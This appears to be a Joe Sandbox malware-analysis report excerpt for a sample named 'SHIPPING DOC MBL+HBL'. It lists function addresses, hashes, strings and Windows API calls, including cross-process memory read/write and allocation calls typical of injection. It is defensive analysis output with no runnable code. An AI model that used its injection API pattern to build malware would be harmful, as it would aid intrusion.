                    • Instruction ID: 7abb9465ce83a2d0bb122b485b531eea3d5492dac4da250da22865a771f4b2f2
                    • Opcode Fuzzy Hash: 314baefdb16c127fcc00ccbec363571648ab4600c1b3574986af097e1d4e4cfe
                    • Instruction Fuzzy Hash: AF518A23A0DA01DBDB11B714EA593BE6FE49B00714F20AD59E0D1B22F9EF308DC8D646
                    Function 00E2017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 784ee1d9c8fb9a0d50d40bfc9dfb4c6b55a93c957b2840a8763a07b80819650e
                    • Instruction ID: 1ed7b676b021283e34c2f894808836c9bf1408602eeaf5ca5a1ea8ba7f78487e
                    • Opcode Fuzzy Hash: 784ee1d9c8fb9a0d50d40bfc9dfb4c6b55a93c957b2840a8763a07b80819650e
                    • Instruction Fuzzy Hash: B4515636504216DFCF15DF28C4986FA7BA4EF55310F142456EC81BB2E2D730AC4ACB60
                    Function 00E13297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    • Opcode ID: 84e6acfc519cf39a4666f707b7d45838735595713fbf38a0b059962178f108f2
                    • Instruction ID: 61de5676d18659bf280429347abd26f4f96126d83a96f4345cc0bd20a934b28c
                    • Opcode Fuzzy Hash: 84e6acfc519cf39a4666f707b7d45838735595713fbf38a0b059962178f108f2
                    • Instruction Fuzzy Hash: F5518AB16083419FDB24CF28D881B6EBBE1FF89314F04592DE999A7351D731E981CB82
                    Function 00E162F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 6378491e3664c39c8d824153a0fba15c2879c9cd9f39facd25515bbb6e23c099
                    • Instruction ID: 467c68c17b73ede9d985a482d988d6072cc544b65f1a593f8f91f83e09815c1f
                    • Opcode Fuzzy Hash: 6378491e3664c39c8d824153a0fba15c2879c9cd9f39facd25515bbb6e23c099
                    • Instruction Fuzzy Hash: B851C371900319DBDB24CF55C9817EAB7F4FF44318F20956EE95AEB281E770AA84CB40
                    Function 00E59AB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E617ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59558,?,?,00000034,00000800,?,00000034), ref: 00E61817
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E59B01
                      • Part of subcall function 00E617B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59587,?,?,00000800,?,00001073,00000000,?,?), ref: 00E617E2
                      • Part of subcall function 00E6170F: GetWindowThreadProcessId.USER32(?,?), ref: 00E6173A
                      • Part of subcall function 00E6170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E5951C,00000034,?,?,00001004,00000000,00000000), ref: 00E6174A
                      • Part of subcall function 00E6170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E5951C,00000034,?,?,00001004,00000000,00000000), ref: 00E61760
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E59B6E
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E59BBB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 5a0def9d2681fcec8ca758f374dba77e2a47569bb940f234cb2261a3453227f9
                    • Instruction ID: 35142e0fb061f4cde476e65194e62e137294fd195fa19b75f7548d854f4ba365
                    • Opcode Fuzzy Hash: 5a0def9d2681fcec8ca758f374dba77e2a47569bb940f234cb2261a3453227f9
                    • Instruction Fuzzy Hash: AD418D76900218BFDB11DFA4DC81EDEBBB8EF09300F104099FA55B7191DA706E88CBA0
                    Function 00E87978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8F910,00000000,?,?,?,?), ref: 00E87A11
                    • GetWindowLongW.USER32 ref: 00E87A2E
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E87A3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 3a27b3be1ed2ccddce80e2504ed8a06ce3d09039c39cc6db5fd36b2fe8279211
                    • Instruction ID: 201cb01fb0cab64feec120e7ec456e904c73682982f9ac41ada9714b2b5615d0
                    • Opcode Fuzzy Hash: 3a27b3be1ed2ccddce80e2504ed8a06ce3d09039c39cc6db5fd36b2fe8279211
                    • Instruction Fuzzy Hash: E631D031204606AFDB15AF34CC45BEA77A9EB44328F206725F8BDB21E0D730ED918B50
                    Function 00E8740B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87493
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E874A7
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E874CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 72939447a9e55fccf34356c019ce4778cdffb353a7f8d19d138d45ddaf7d15a9
                    • Instruction ID: e0502e7034c9ba3e1d44b6a07ae87a39c5f3d2a21f97bbd4d80323c1bf97f803
                    • Opcode Fuzzy Hash: 72939447a9e55fccf34356c019ce4778cdffb353a7f8d19d138d45ddaf7d15a9
                    • Instruction Fuzzy Hash: 6E21D332500219AFDF219F90DC42FEA3BA9EF48724F211214FE587B1D0D671E895DB90
                    Function 00E86CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E86D6D
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E86D7D
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E86DA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: e6c2656276eaaf4cf67dea0cd53984ad00ab1c718f8709b4c2ea90dfa121dcfe
                    • Instruction ID: 45d2febd47d039b9c2385661f5655cee245a15da22c82171bc3e07e0050e0de2
                    • Opcode Fuzzy Hash: e6c2656276eaaf4cf67dea0cd53984ad00ab1c718f8709b4c2ea90dfa121dcfe
                    • Instruction Fuzzy Hash: 7B219532610118BFDF11AF54DC45FAB37AAEF89754F119124FA0CBB1D0C671AC5197A0
                    Function 00E73AFF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    • __snwprintf.LIBCMT ref: 00E73B7C
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __snwprintf_memmove
                    • String ID: , $$AUTOITCALLVARIABLE%d$%
                    • API String ID: 3506404897-3879706725
                    • Opcode ID: 43b4a42395fa2e8a2ab742b69e1663055abd08757b6c3a07ea8f51207e21c208
                    • Instruction ID: bb712a78d4e654144b2627205af80c734b57f84972b1a75a2edcda0d4d2b4385
                    • Opcode Fuzzy Hash: 43b4a42395fa2e8a2ab742b69e1663055abd08757b6c3a07ea8f51207e21c208
                    • Instruction Fuzzy Hash: 4F215475601219AACF54EF64CC82E9E77A4FF44700F406498F449B7281DB30AE85DBA1
                    Function 00E87740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E877A4
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E877B9
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E877C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: a5628f23483bb95c8d96dcc3e36f67409858d8f131701ccf79814cb6d67adb9d
                    • Instruction ID: b1f96abd13c18b5560b2cb0ae781c93ed6c8879105c71cd171ad0caae584d745
                    • Opcode Fuzzy Hash: a5628f23483bb95c8d96dcc3e36f67409858d8f131701ccf79814cb6d67adb9d
                    • Instruction Fuzzy Hash: CD11E732254208BEEF106F61CC45FE77BA9EF89719F111119F749B60D0D672E851DB20
                    Function 00E26CEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: $@B
                    • API String ID: 3494438863-460053111
                    • Opcode ID: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                    • Instruction ID: 554b3c266c2bd5da96d3c7e7e1bbee137f5bb4c0fa0fdc07102ede7ecfc0da5d
                    • Opcode Fuzzy Hash: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                    • Instruction Fuzzy Hash: 2CF0C872305626CEF728AF26BD11BB167E4E741324B101937E504FE1E0E77598C24680
                    Function 00E04C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04C2E), ref: 00E04CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                    • Instruction ID: 9f187594e21f36147ce9c0dc429cd281e0fdd93e9c3bf85270bdeb93eb4953cb
                    • Opcode Fuzzy Hash: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                    • Instruction Fuzzy Hash: 88D012B0511723CFE7205F31DA58646B6D5AF05755F219839D88DF6190D670D4C0C750
                    Function 00E04D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04CE1,?), ref: 00E04DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E04DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                    • Instruction ID: 357d11a3a319922a2a7519453374a0fe44e8389c6b4cdebf16828de950de0b52
                    • Opcode Fuzzy Hash: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                    • Instruction Fuzzy Hash: FDD017B1651713CFD7209F32D908A9676E5AF05759B11983AD8CAF61A0E770D8C0CBA0
                    Function 00E04D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04D2E,?,00E04F4F,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                    • Instruction ID: 20b297652015321db4b5b2898fa56982636de72624ec28d6a8f0dde9e6de4e59
                    • Opcode Fuzzy Hash: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                    • Instruction Fuzzy Hash: 73D017B1611713CFD7209F72D90865676E8AF15756B11983ED48AF62A0E670D8C0CB60
                    Function 00E80E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00E810C1), ref: 00E80E80
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                    • Instruction ID: bf01d40b0a2fd2fd5850b2f0ea18a17b116efbcc16fa1823573a19f3fcf312af
                    • Opcode Fuzzy Hash: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                    • Instruction Fuzzy Hash: 8CD01770591723CFDB30AF36C9086C776E4AF04756B11AC3AE58EF6151E670C884CB60
                    Function 00E791F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E78E09,?,00E8F910), ref: 00E79203
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E79215
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                    • Instruction ID: b1badfecb929000ea02d92c7d79692d3bbe4e159455bd3f97c40627b73fac077
                    • Opcode Fuzzy Hash: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                    • Instruction Fuzzy Hash: F5D0C230690313EFC7206F31DD0820272D5AF00351B00D839D88DF2162D670C480C710
                    Function 00E574A5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                    • Instruction ID: b29d5da0cbd53a504a57be40a50e522e5dc6eaba1977028fad86c566a8a0868d
                    • Opcode Fuzzy Hash: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                    • Instruction Fuzzy Hash: 4EC18F74A04216EFCB14CFA8D884DAEB7B5FF48705B105999EC45EB250D730ED95CB90
                    Function 00E7E13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00E7E1D2
                    • CharLowerBuffW.USER32(?,?), ref: 00E7E215
                      • Part of subcall function 00E7D8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D8D9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E415
                    • _memmove.LIBCMT ref: 00E7E428
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
